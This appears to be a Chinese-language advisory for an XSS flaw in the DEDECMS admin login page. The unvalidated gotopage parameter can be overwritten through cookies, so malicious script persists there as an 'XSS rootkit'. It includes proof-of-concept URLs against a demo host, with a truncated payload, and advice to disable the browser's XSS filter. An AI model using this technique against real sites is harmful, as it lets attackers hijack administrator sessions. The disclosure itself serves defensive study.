影响版本:
DEDECMS全版本
漏洞描叙:
DEDECMS后台登陆模板中的gotopage变量未效验传入数据,导致XSS漏洞。
\dede\templets\login.htm
65行左右
由于DEDECMS的全局变量注册机制,该变量内容可以被COOKIE变量覆盖,可以在客户端持久化存储,***终导致一个XSS ROOTKIT。
漏洞危害:
管理员在触发DEDECMS任意的XSS漏洞(如留言本XSS)后,可以通过该漏洞永久劫持覆盖gotopage变量,在DEDECMS的后台登陆页面永久嵌入任意的恶意代码。
验证:
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
http://v57.demo.dedecms.com/dede/login.php?gotopage=">
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php